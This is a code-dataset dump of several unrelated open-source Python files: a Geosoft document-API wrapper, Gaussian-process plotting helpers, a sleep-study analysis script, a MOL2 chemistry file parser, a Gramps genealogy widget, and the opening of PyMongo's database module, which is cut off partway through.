| repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated | ratio | config_test | has_no_keywords | few_assignments |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
GeosoftInc/gxpy
|
geosoft/gxapi/GXDOCU.py
|
1
|
10991
|
### extends 'class_empty.py'
### block ClassImports
# NOTICE: Do not edit anything here, it is generated code
from . import gxapi_cy
from geosoft.gxapi import GXContext, float_ref, int_ref, str_ref
### endblock ClassImports
### block Header
# NOTICE: The code generator will not replace the code in this block
### endblock Header
### block ClassImplementation
# NOTICE: Do not edit anything here, it is generated code
class GXDOCU(gxapi_cy.WrapDOCU):
"""
GXDOCU class.
Class to work with documents
"""
def __init__(self, handle=0):
super(GXDOCU, self).__init__(GXContext._get_tls_geo(), handle)
@classmethod
def null(cls):
"""
A null (undefined) instance of `GXDOCU <geosoft.gxapi.GXDOCU>`
:returns: A null `GXDOCU <geosoft.gxapi.GXDOCU>`
:rtype: GXDOCU
"""
return GXDOCU()
def is_null(self):
"""
Check if this is a null (undefined) instance
:returns: True if this is a null (undefined) instance, False otherwise.
:rtype: bool
"""
return self._internal_handle() == 0
# Miscellaneous
def copy(self, doc_us):
"""
Copy `GXDOCU <geosoft.gxapi.GXDOCU>`
:param doc_us: Source `GXDOCU <geosoft.gxapi.GXDOCU>`
:type doc_us: GXDOCU
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._copy(doc_us)
@classmethod
def create(cls):
"""
Create a document object
:returns: `GXDOCU <geosoft.gxapi.GXDOCU>` Object
:rtype: GXDOCU
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapDOCU._create(GXContext._get_tls_geo())
return GXDOCU(ret_val)
@classmethod
def create_s(cls, bf):
"""
Create from a serialized source
:param bf: `GXBF <geosoft.gxapi.GXBF>` from which to read `GXDOCU <geosoft.gxapi.GXDOCU>`
:type bf: GXBF
:returns: `GXDOCU <geosoft.gxapi.GXDOCU>` Object
:rtype: GXDOCU
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapDOCU._create_s(GXContext._get_tls_geo(), bf)
return GXDOCU(ret_val)
def get_file(self, file):
"""
Get the document and place in a file.
:param file: File to which to write document
:type file: str
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._get_file(file.encode())
def get_file_meta(self, file):
"""
Get the document and place in a file with metadata.
:param file: File to which to write document
:type file: str
.. versionadded:: 5.1.8
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** If this document is only a URL link, the URL link will
be resolved and the document downloaded from the appropriate
server using the protocol specified.
If the document has metadata, and the native document does not
support metadata, the metadata will be placed in an associated
file "filename.extension.GeosoftMeta"
"""
self._get_file_meta(file.encode())
def get_meta(self, meta):
"""
Get the document's meta
:param meta: `GXMETA <geosoft.gxapi.GXMETA>` object to fill in with the document's meta
:type meta: GXMETA
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._get_meta(meta)
def doc_name(self, name):
"""
The document name.
:param name: Buffer to fill with document name
:type name: str_ref
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
name.value = self._doc_name(name.value.encode())
def file_name(self, name):
"""
The original document file name.
:param name: Buffer to fill with document file name
:type name: str_ref
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
name.value = self._file_name(name.value.encode())
def have_meta(self):
"""
Checks if a document has metadata.
:rtype: bool
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = self._have_meta()
return ret_val
def is_reference(self):
"""
Is the document only a reference (a URL) ?
:returns: 1 - Yes, 0 - No
:rtype: int
.. versionadded:: 5.1.6
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = self._is_reference()
return ret_val
def open(self, mode):
"""
Open a document in the document viewer
:param mode: :ref:`DOCU_OPEN`
:type mode: int
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** On Windows, the default application for the file extension is
used to open the file.
"""
self._open(mode)
def serial(self, bf):
"""
Serialize `GXDOCU <geosoft.gxapi.GXDOCU>`
:param bf: `GXBF <geosoft.gxapi.GXBF>` in which to write object
:type bf: GXBF
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._serial(bf)
def set_file(self, type, name, file):
"""
Set the document from a file source.
:param type: Document type
:param name: Document name, if "" file name will be used
:param file: Document file, must exist
:type type: str
:type name: str
:type file: str
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** Document types are normally identified by their extension. If you
leave the document type blank, the extension of the document file
will be used as the document type.
To resolve conflicting types, you can define your own unique type
by entering your own type "extension" string.
The following types are pre-defined (as are any normal Geosoft
file types):
"htm" HTML
"html" HTML
"txt" ASCII text file
"doc" Word for Windows document
"pdf" Adobe PDF
"map" Geosoft map file
"mmap" Mapinfo map file (real extension "map")
"grd" Geosoft grid file
"gdb" Geosoft database
URL Document Links
The document name can be a URL link to the document using one of
the supported protocols. The following protocols are supported:
http://www.mywebserver.com/MyFile.doc - `GXHTTP <geosoft.gxapi.GXHTTP>`
dap://my.dap.server.com/dcs?DatasetName?MyFile.doc - DAP (DAP Document Access)
ftp://my.ftp.server.com/Dir1/MyFile.doc - FTP protocol
The full file name will be stored but no data will be stored with
the `GXDOCU <geosoft.gxapi.GXDOCU>` class and the document can be retrieved using the sGetFile_DOCU
method.
"""
self._set_file(type.encode(), name.encode(), file.encode())
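# Hedged usage sketch (editorial addition, not generated code): assuming a GX
# context has already been created for this process (for example through
# geosoft.gxpy.gx.GXpy()) and that "report.pdf" exists, a document could be
# attached and later written back out; names below are illustrative only.
#
#     docu = GXDOCU.create()
#     docu.set_file("pdf", "Survey report", "report.pdf")   # or a URL link such as http://www.mywebserver.com/MyFile.doc
#     docu.get_file("report_copy.pdf")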
def set_file_meta(self, type, name, file):
"""
Set the document from a file source with metadata.
:param type: Document type extension
:param name: Document name, if NULL use file name
:param file: Document file or URL
:type type: str
:type name: str
:type file: str
.. versionadded:: 5.1.8
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** See `set_file <geosoft.gxapi.GXDOCU.set_file>`.
This function is the same as sSetFile_DOCU, plus ensures that a
`GXMETA <geosoft.gxapi.GXMETA>` exists that includes the "Data" class. If the file has
associated metadata, either supported natively in the file, or
through an associated file "filename.extension.GeosoftMeta",
that metadata will be loaded into the `GXDOCU <geosoft.gxapi.GXDOCU>` meta, and a Data
class will be constructed if one does not exist.
Also, the Document type Extension is very important in that it
specifies the document types that natively have metadata. The
ones currently supported are:
"map" Geosoft map file
"gdb" Geosoft database
"grd" Geosoft grid file
"""
self._set_file_meta(type.encode(), name.encode(), file.encode())
def set_meta(self, meta):
"""
Set the document's meta
:param meta: `GXMETA <geosoft.gxapi.GXMETA>` to add to the document's meta
:type meta: GXMETA
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._set_meta(meta)
### endblock ClassImplementation
### block ClassExtend
# NOTICE: The code generator will not replace the code in this block
### endblock ClassExtend
### block Footer
# NOTICE: The code generator will not replace the code in this block
### endblock Footer
|
bsd-2-clause
| 653,045,108,704,022,000
| 27.257069
| 135
| 0.589937
| false
| 3.710668
| false
| false
| false
|
nealegibson/GeePea
|
src/GPUtils.py
|
1
|
6261
|
"""
Some non-core utility functions for GPs
"""
from __future__ import print_function
import numpy as np
import pylab
from scipy import ndimage
try:
import dill
dill_available = 'yes'
except ImportError: dill_available = 'no'
####################################################################################################
def load(filename):
"""
Simple function to load a GP from a file using dill
"""
if dill_available == 'no':
raise ImportError("dill module not found. can't load gp")
else:
file = open(filename,'rb')
gp = dill.load(file)
file.close()
return gp
def save(ob,filename):
"""
Simple function to save GP or group to file using dill
"""
if dill_available == 'no':
print("dill module not available. can't save gp")
else:
file = open(filename,'wb')
dill.dump(ob,file)
file.close()
def RandomVector(K,m=None):
"""
Get a random gaussian vector from the covariance matrix K.
"""
if m is None: #set mean function if not given
m = np.zeros(K[:,0].size)
return np.random.multivariate_normal(m,K)
def RandVectorFromConditionedGP(K_s,PrecMatrix,K_ss,r,m=None):
"""
Get a random gaussian vector from the covariance matrix K.
m - mean function
calculates conditional covariance K_ss
calculates conditional mean and adds to mean function
"""
#ensure all data are in matrix form
K_s = np.matrix(K_s)
K_ss = np.matrix(K_ss)
PrecMatrix = np.matrix(PrecMatrix)
r = np.matrix(np.array(r).flatten()).T # (n x 1) column vector
# (q x n) = (q x n) * (n x n) * (n x 1)
f_s = K_s * PrecMatrix * r
# (q x q) = (q x q) - (q x n) * (n x n) * (n x q)
K_ss_cond = K_ss - np.matrix(K_s) * PrecMatrix * np.matrix(K_s).T
if m is None: #set zero mean function if not given
m = np.zeros(f_s.size)
return RandomVector(K_ss_cond,m=np.array(f_s).flatten()+m)
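# Hedged worked example (editorial addition): for a training covariance K (n x n)
# with white-noise level wn, cross-covariance K_s (q x n) and test covariance
# K_ss (q x q), a conditioned draw at the test points could be obtained as
#
#     prec = np.linalg.inv(K + wn**2 * np.eye(K.shape[0]))
#     f_draw = RandVectorFromConditionedGP(K_s, prec, K_ss, y - mf)
#
# where K, K_s, K_ss, wn, the observations y and mean function mf are the
# user's own quantities (placeholders here).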
def PlotRange(ax,x,y,y_err,sigma=1.0,facecolor='0.5',alpha=0.6):
"""
Plot a range 'area' for GP regression given x,y values, y_error and no. sigma
"""
y1,y2 = y+sigma*y_err, y-sigma*y_err
ax.fill_between(x, y1, y2, where=y1>=y2, facecolor=facecolor,alpha=alpha)
def PlotSigmas(x,y,y_err,nsig=3,color='r',alpha=0.5):
"""
Plot 1 and 2 sigma range areas for GP regression given x,y values, y_error
"""
if type(color) is str: #create list
color = [color,]*(nsig+1)
for i in np.arange(-nsig,nsig+1):
pylab.plot(x,y+y_err*i,'-',color=color[np.abs(i)],alpha=alpha,lw=0.5)
def PlotDensity(x,y,yerr,n=200,nsig=5.,cmap='gray_r',sm_x=None,supersamp=None,**kwargs):
#need to resample to a regular spacing
if supersamp is None: supersamp = 1
x_new = np.linspace(x.min(),x.max(),x.size*supersamp)
y = np.interp(x_new,x,y)
yerr = np.interp(x_new,x,yerr)
x = x_new
#set range of y
y_lower,y_upper = (y-nsig*yerr).min(),(y+nsig*yerr).max()
y_range = np.linspace(y_lower,y_upper,n)
#set image extent
x_spacing = x[1]-x[0]
y_spacing = y_range[1]-y_range[0]
extent = [x.min()-x_spacing/2.,x.max()+x_spacing/2., y_range[0]-y_spacing/2.,y_range[-1]+y_spacing/2.]
print(y_spacing)
XX,YY = np.meshgrid(x,y_range)
IM = np.exp(-((YY-y)**2 / yerr**2)/2.)
#smooth in x?
if sm_x:
IM = ndimage.gaussian_filter1d(IM, sigma=sm_x, axis=1)
#IM = ndimage.median_filter(IM, footprint=(1,3))
#mask the array below nsig sigma - this allows overlapping transits, and presumably
#lowers file size
MaskedIM = np.ma.masked_where(IM<np.exp(-0.5*nsig**2),IM)
pylab.imshow(MaskedIM, cmap=cmap, aspect='auto', origin='lower', extent=extent, \
vmin=np.exp(-0.5*nsig**2),vmax=1,interpolation='gaussian',alpha=1.0,**kwargs)
return IM
def PlotRanges(x,y,y_err,lc='k',ls='-',title=None,lw=1,lw2=-1,c2='0.8',c1='0.6',alpha=0.8,ax=None):
"""
Plot 1 and 2 sigma range areas for GP regression given x,y values, y_error
"""
if ax==None: ax = pylab.gca()
ax.plot(x, y, color=lc, linewidth=lw, linestyle=ls,alpha=alpha) #plot predictive function and ranges
if lw2 < 0: lw2 = lw/2.
y1,y2 = y+2*y_err, y-2*y_err
ax.fill_between(x, y1, y2, where=y1>=y2, facecolor=c2,lw=lw2,alpha=alpha)
ax.plot(x,y1,'-',x,y2,'-',color=lc,alpha=alpha,lw=lw2)
y1,y2 = y+1*y_err, y-1*y_err
ax.fill_between(x, y1, y2, where=y1>=y2, facecolor=c1,lw=lw2,alpha=alpha)
ax.plot(x,y1,'-',x,y2,'-',color=lc,alpha=alpha,lw=lw2)
#pylab.plot()
if title: pylab.title(title)
def PlotData(x,y,y_err,title=None,fmt='o',ms=4,mfc='0.9',mec='k',ecolor='k',alpha=0.8,capsize=2,ax=None,**kwargs):
"""
Plot the data
"""
if ax==None: ax = pylab.gca()
#ax.errorbar(x,y,yerr=y_err,fmt='ko',fc='r',**kwargs)
ax.errorbar(x,y,yerr=y_err,fmt=fmt,ms=ms,mfc=mfc,mec=mec,ecolor=ecolor,\
alpha=alpha,capsize=capsize,**kwargs)
if title: pylab.title(title)
pylab.plot()
def PlotRange3D(ax,x1_pred,x2_pred,f_pred,f_pred_err,sigma=1.,facecolor=['r','g'],plot_range=True):
"""
Plot a range 'surface' for GP regression given X,f values, f_error and no. sigma
onto 3D axis 'ax'
"""
from matplotlib.mlab import griddata
#create X,Y mesh grid
xi, yi = np.arange(x1_pred.min(),x1_pred.max(),0.1), np.arange(x2_pred.min(),x2_pred.max(),0.1)
X, Y = np.meshgrid(xi, yi)
#use grid data to place (x1_pred, x2_pred, f_pred) values onto Z grid
Z = griddata(x1_pred, x2_pred, f_pred, xi, yi) #grid the predicted data
Z_u = griddata(x1_pred, x2_pred, f_pred+f_pred_err*sigma, xi, yi) #and error data...
Z_d = griddata(x1_pred, x2_pred, f_pred-f_pred_err*sigma, xi, yi)
#plot the surfaces on the axis (must be passed a 3D axis)
ax.plot_wireframe(X,Y,Z,color=facecolor[0],rstride=1,cstride=1)
if plot_range:
ax.plot_wireframe(X,Y,Z_u,color=facecolor[1],rstride=2,cstride=2)
ax.plot_wireframe(X,Y,Z_d,color=facecolor[1],rstride=2,cstride=2)
####################################################################################################
def add_n_par(N):
"""
Simple decorator function to add n_par to a static function - required for built in mean function
"""
def decor(func):
func.n_par = N
return func
return decor
###############################################################################################################
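# Hedged usage sketch (editorial addition): draw one random function from a
# squared-exponential covariance with RandomVector and shade 1- and 2-sigma
# bands with PlotRanges; the 50-point grid and length-scale of 0.1 are
# arbitrary illustrative choices.
#
#     x = np.linspace(0., 1., 50)
#     K = np.exp(-0.5 * (x[:, None] - x[None, :])**2 / 0.1**2) + 1e-8 * np.eye(50)
#     f = RandomVector(K)
#     PlotRanges(x, f, np.sqrt(np.diag(K)))
#     pylab.show()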
|
gpl-3.0
| -4,645,364,629,243,388,000
| 30.305
| 114
| 0.612362
| false
| 2.68482
| false
| false
| false
|
KHP-Informatics/sleepsight-analytics
|
generate_thesis_outputs.py
|
1
|
5023
|
import numpy as np
from tools import Logger, Participant
import thesis as T
path = '/Users/Kerz/Documents/projects/SleepSight/ANALYSIS/data/'
plot_path = '/Users/Kerz/Documents/projects/SleepSight/ANALYSIS/plots/'
log_path = '/Users/Kerz/Documents/projects/SleepSight/ANALYSIS/logs/'
options = {'periodicity': False,
'participant-info': False,
'compliance': False,
'stationarity': False,
'symptom-score-discretisation': False,
'feature-delay': False,
'feature-selection': False,
'non-parametric-svm': False,
'non-parametric-gp': True
}
log = Logger(log_path, 'thesis_outputs.log', printLog=True)
# Load Participants
log.emit('Loading participants...', newRun=True)
aggr = T.Aggregates('.pkl', path, plot_path)
# Export Periodicity tables
if options['periodicity']:
log.emit('Generating PERIODICITY table...')
pt = T.PeriodictyTable(aggr, log)
pt.run()
pt.exportLatexTable(summary=False)
pt.exportLatexTable(summary=True)
# Export Participant Info
if options['participant-info']:
log.emit('Generating PARTICIPANTS-INFO table...')
participantInfo = aggr.getPariticpantsInfo()
features = [
'id',
'gender',
'age',
'durationIllness',
'PANSS.general',
'PANSS.negative',
'PANSS.positive',
'PANSS.total',
'Clozapine',
'No.of.Drugs'
]
participantInfoSelect = participantInfo[features]
aggr.exportLatexTable(participantInfoSelect, 'DataParticipantInfo')
# Compliance
if options['compliance']:
log.emit('Generating COMPLIANCE figure and table...')
# Compliance Figure
comp = T.Compliance(aggr, log)
comp.generateFigure(show=False, save=True)
comp.exportLatexTable(save=True)
# Compliance Information Gain
comp = T.Compliance(aggr, log)
comp.normaliseMissingness()
labelsNoMissingness = comp.dfCount.T['No Missingness']
labelsSleep = comp.dfCount.T['sleep']
labelsSymptom = comp.dfCount.T['symptom']
infoTable = aggr.getPariticpantsInfo()
labels = {'Passive data': labelsNoMissingness,
'Active (Sleep Q.)': labelsSleep,
'Active (Symptoms Q.)': labelsSymptom}
features = [
'PANSS.general',
'PANSS.negative',
'PANSS.positive',
'PANSS.total',
'age',
'durationIllness',
'gender',
'Clozapine',
'No.of.Drugs'
]
igTable = T.InfoGainTable(infoTable[features], labels)
igTable.run()
igTable.exportLatexTable(aggr.pathPlot, orderedBy='Passive data', save=True)
# Stationarity results
if options['stationarity']:
log.emit('Generating STATIONARITY table...')
stTable = T.StationaryTable(aggr, log)
stTable.run()
stTable.exportLatexTable(show=False, save=True)
# Symptom Score discretisation
if options['symptom-score-discretisation']:
log.emit('Generating SYMPTOM-SCORE-DISCRETISATION table...')
disTable = T.DiscretisationTable(aggr, log)
disTable.run()
disTable.exportLatexTable(show=False, save=True)
# feature delay
if options['feature-delay']:
log.emit('Generating FEATURE-DELAY table...')
dEval = T.DelayEval(aggr, log)
dEval.generateDelayTable()
dEval.exportLatexTable()
# feature selection with MIFS & mRMR
if options['feature-selection']:
log.emit('Generating FEATURE-SELECTION table...')
fs = T.FeatureSelectionEval(aggr, log)
fs.generateHistogramForNTopFeatures(nFeatures=10)
fs.generateFigure(show=True)
# SVM-linear results
if options['non-parametric-svm']:
log.emit('Generating NON-PARAMETRIC-SVM table...')
fs = T.FeatureSelectionEval(aggr, log)
fs.generateHistogramForNTopFeatures(nFeatures=10)
fMifs = []
fMrmr = []
for table in fs.histogramsFs:
if 'MIFS-ADASYN' in table.columns:
fMifs = list(table.index[0:10])
if 'mRMR-ADASYN' in table.columns:
fMrmr = list(table.index[0:10])
totalF = {
'mRMR': {'ADASYN': {'fRank': fMifs}},
'MIFS': {'ADASYN': {'fRank': fMrmr}}
}
results = T.compute_SVM_on_all_participants(aggr, totalF, log)
pTotal = Participant(id=99, path=path)
pTotal.id = 'Total'
pTotal.nonParametricResults = results
aggr.aggregates.append(pTotal)
npEval = T.NonParametricSVMEval(aggr, log)
npEval.logClassificationReports()
npEval.summarise()
npEval.exportLatexTable(show=True)
log.emit('\n{}'.format(np.mean(npEval.summary)), indents=1)
log.emit('\n{}'.format(np.std(npEval.summary)), indents=1)
# GP results
if options['non-parametric-gp']:
gpEval = T.GaussianProcessEval(aggr, log)
gpEval.logClassificationReports()
gpEval.exportLatexTable(mean=False)
gpEval.exportLatexTable(mean=True)
gpEval.plotSummaryGP(plot_path)
|
apache-2.0
| -5,265,038,417,409,206,000
| 31.198718
| 80
| 0.643241
| false
| 3.405424
| false
| false
| false
|
platinhom/CADDHom
|
python/format/HHmol2.py
|
1
|
4222
|
# -*- coding: utf-8 -*-
"""
Created on 2015-10-05
@author: Zhixiong Zhao
"""
import os
import __init__
from HHFormat import *
import molecule.HHMolecule
import molecule.HHAtom
import molecule.HHResidue
import molecule.HHBond
import geometry.HHPoint
Mol=molecule.HHMolecule.Molecule
Atom=molecule.HHAtom.Atom
Res=molecule.HHResidue.Residue
Bond=molecule.HHBond.Bond
Point=geometry.HHPoint.Point
class MOL2(FileFormator):
extension=['mol2'];
def CreateAtomLine(self, atom, lenatom=4, lenres=3):
output=str(atom.index).rjust(lenatom)+" "+atom.name.ljust(5)
output+=("%.4f" % atom.coordinates.x).rjust(11) + ("%.4f" % atom.coordinates.y).rjust(11)+ ("%.4f" % atom.coordinates.z).rjust(11)+ ' '
output+=atom.atype.ljust(6)+str(atom.resid).rjust(lenres)+ ' ' + atom.resname.ljust(6)+ atom.pcharge.rjust(9)+ os.linesep
return output
def CreateBondline(self, bond, lenbond=4):
output=str(bond.index).rjust(lenbond)+" "+str(bond.idx_bgn).rjust(lenbond)+" "+\
str(bond.idx_end).rjust(lenbond)+" "+bond.btype.lower().ljust(lenbond)+ os.linesep
return output
def WriteObj(self,obj):
if (isinstance(obj,Atom)):
self.write(self.CreateAtomLine(obj))
elif(isinstance(obj,Res) or isinstance(obj,Mol)):
for atom in obj.atoms:
self.write(self.CreateAtomLine(atom))
elif(isinstance(obj,Bond)):
self.write(self.CreateBondline(obj));
else:
self.write(str(obj));
def ReadAtomLine(self, Line):
items=Line.split()
atom=Atom()
atom.index = int(items[0])
atom.atomid = int(items[0])
atom.name = items[1]
atom.coordinates = Point(float(items[2]), float(items[3]), float(items[4]))
atom.atype=items[5]
#sybyl type
#atom.element_name=atom.atype[0:2].strip('.').strip()
atom.element_name=atom.DeduceElementFromName(atom.name);
if len(items)==9:
atom.resid = int(items[6])
atom.resname = items[7]
atom.charge = items[8]
return atom;
def ReadBondLine(self, Line):
items=Line.split()
bond=Bond()
bond.index = int(items[0])
bond.idx_bgn = int(items[1])
bond.idx_end = int(items[2])
bond.btype = items[3]
return bond;
def WriteMolFile(self,mol,filename):
self.open(filename,'w');
self.write("@<TRIPOS>MOLECULE\n")
self.write(mol.name+'\n')
self.write("%5d %5d %5d %5d %5d \n", mol.GetNumAtom(), mol.GetNumBond(), mol.GetNumFrag(), 0, 0);
self.write("@<TRIPOS>ATOM\n");
self.WriteObj(mol);
self.write("@<TRIPOS>BOND\n");
def ReadMolFile(self, filename):
self.open(filename,'r');
findmol=False;
findatom=False;
findbond=False;
nextmol=False;
mols=[]
mol=None
for line in self.handle:
if (line[:17] == "@<TRIPOS>MOLECULE"):
findmol=True;
findatom=False;
findbond=False;
if (nextmol):
mols.append(mol)
nextmol=False;
mol=Mol()
continue;
if (line[:13] == "@<TRIPOS>ATOM"):
findatom=True;
findmol=False;
nextmol=True;
continue;
if (line[:13] == "@<TRIPOS>BOND"):
findatom=False;
findbond=True;
continue;
if (findbond and line[:9]=="@<TRIPOS>"):
findbond=False;
continue;
if (findatom):
atom=self.ReadAtomLine(line);
atom.mol=mol;
mol.atoms.append();
if (findbond):
bond=self.ReadBondLine(line);
bond.mol=mol;
bond.SetAtomsFromIdx()
mol.bonds.append(bond);
mols.append(mol);
self.close();
if (len(mols)==1):return mols[0];
elif (len(mols)>1):return mols;
elif (len(mols)==0):return None;
if __name__=="__main__":
mr=MOL2()
a=mr.ReadMolFile("test.mol2");
print(a)
print(a.atoms[0])
|
gpl-2.0
| 2,584,344,862,297,078,300
| 30.044118
| 143
| 0.541686
| false
| 3.361465
| false
| false
| false
|
ondrokrc/gramps
|
gramps/gui/editors/displaytabs/backreflist.py
|
1
|
4638
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2007 Donald N. Allingham
# Copyright (C) 2009-2011 Gary Burton
# Copyright (C) 2011 Tim G L Lyons
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#-------------------------------------------------------------------------
#
# Python classes
#
#-------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.gettext
#-------------------------------------------------------------------------
#
# GTK libraries
#
#-------------------------------------------------------------------------
from gi.repository import Gtk
#-------------------------------------------------------------------------
#
# GRAMPS classes
#
#-------------------------------------------------------------------------
from ...widgets import SimpleButton
from .embeddedlist import EmbeddedList, TEXT_COL, MARKUP_COL, ICON_COL
from ...utils import edit_object
#-------------------------------------------------------------------------
#
# BackRefList
#
#-------------------------------------------------------------------------
class BackRefList(EmbeddedList):
_HANDLE_COL = 3
#index = column in model. Value =
# (name, sortcol in model, width, markup/text, weight_col
_column_names = [
(_('Type'), 0, 100, TEXT_COL, -1, None),
(_('ID'), 1, 75, TEXT_COL, -1, None),
(_('Name'), 2, 250, TEXT_COL, -1, None),
]
def __init__(self, dbstate, uistate, track, obj, refmodel, callback=None):
self.obj = obj
EmbeddedList.__init__(self, dbstate, uistate, track,
_('_References'), refmodel)
self._callback = callback
self.connectid = self.model.connect('row-inserted', self.update_label)
self.track_ref_for_deletion("model")
def update_label(self, *obj):
if self.model.count > 0:
self._set_label()
if self._callback and self.model.count > 1:
self._callback()
def right_click(self, obj, event):
return
def _cleanup_local_connects(self):
self.model.disconnect(self.connectid)
def _cleanup_on_exit(self):
# model may be destroyed already in closing managedwindow
if hasattr(self, 'model'):
self.model.destroy()
def is_empty(self):
return self.model.count == 0
def _create_buttons(self, share=False, move=False, jump=False, top_label=None):
"""
Create a button box consisting of one button: Edit.
This button box is then appended hbox (self).
Method has signature of, and overrides create_buttons from _ButtonTab.py
"""
self.edit_btn = SimpleButton('gtk-edit', self.edit_button_clicked)
self.edit_btn.set_tooltip_text(_('Edit reference'))
hbox = Gtk.Box()
hbox.set_spacing(6)
hbox.pack_start(self.edit_btn, False, True, 0)
hbox.show_all()
self.pack_start(hbox, False, True, 0)
self.add_btn = None
self.del_btn = None
self.track_ref_for_deletion("edit_btn")
self.track_ref_for_deletion("add_btn")
self.track_ref_for_deletion("del_btn")
def _selection_changed(self, obj=None):
if self.dirty_selection:
return
if self.get_selected():
self.edit_btn.set_sensitive(True)
else:
self.edit_btn.set_sensitive(False)
def get_data(self):
return self.obj
def column_order(self):
return ((1, 0), (1, 1), (1, 2))
def find_node(self):
(model, node) = self.selection.get_selected()
try:
return (model.get_value(node, 4), model.get_value(node, 3))
except:
return (None, None)
def edit_button_clicked(self, obj):
(reftype, ref) = self.find_node()
edit_object(self.dbstate, self.uistate, reftype, ref)
|
gpl-2.0
| 2,038,408,885,428,916,200
| 32.854015
| 83
| 0.544631
| false
| 4.061296
| false
| false
| false
|
initNirvana/Easyphotos
|
env/lib/python3.4/site-packages/pymongo/database.py
|
1
|
44607
|
# Copyright 2009-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Database level operations."""
import warnings
from bson.binary import OLD_UUID_SUBTYPE
from bson.code import Code
from bson.dbref import DBRef
from bson.son import SON
from pymongo import auth, common, helpers
from pymongo.collection import Collection
from pymongo.command_cursor import CommandCursor
from pymongo.errors import (CollectionInvalid,
ConfigurationError,
OperationFailure)
from pymongo.read_preferences import (modes,
secondary_ok_commands,
ReadPreference)
from pymongo.son_manipulator import SONManipulator
class Database(common.BaseObject):
"""A Mongo database.
"""
def __init__(self, connection, name):
"""Get a database by connection and name.
Raises :class:`TypeError` if `name` is not an instance of
:class:`basestring` (:class:`str` in python 3). Raises
:class:`~pymongo.errors.InvalidName` if `name` is not a valid
database name.
:Parameters:
- `connection`: a client instance
- `name`: database name
.. mongodoc:: databases
"""
super(Database,
self).__init__(slave_okay=connection.slave_okay,
read_preference=connection.read_preference,
tag_sets=connection.tag_sets,
secondary_acceptable_latency_ms=(
connection.secondary_acceptable_latency_ms),
safe=connection.safe,
uuidrepresentation=connection.uuid_subtype,
**connection.write_concern)
if not isinstance(name, str):
raise TypeError("name must be an instance "
"of %s" % (str.__name__,))
if name != '$external':
helpers._check_database_name(name)
self.__name = str(name)
self.__connection = connection
self.__incoming_manipulators = []
self.__incoming_copying_manipulators = []
self.__outgoing_manipulators = []
self.__outgoing_copying_manipulators = []
def add_son_manipulator(self, manipulator):
"""Add a new son manipulator to this database.
Newly added manipulators will be applied before existing ones.
:Parameters:
- `manipulator`: the manipulator to add
"""
base = SONManipulator()
def method_overwritten(instance, method):
return (getattr(
instance, method).__func__ != getattr(base, method).__func__)
if manipulator.will_copy():
if method_overwritten(manipulator, "transform_incoming"):
self.__incoming_copying_manipulators.insert(0, manipulator)
if method_overwritten(manipulator, "transform_outgoing"):
self.__outgoing_copying_manipulators.insert(0, manipulator)
else:
if method_overwritten(manipulator, "transform_incoming"):
self.__incoming_manipulators.insert(0, manipulator)
if method_overwritten(manipulator, "transform_outgoing"):
self.__outgoing_manipulators.insert(0, manipulator)
@property
def system_js(self):
"""A :class:`SystemJS` helper for this :class:`Database`.
See the documentation for :class:`SystemJS` for more details.
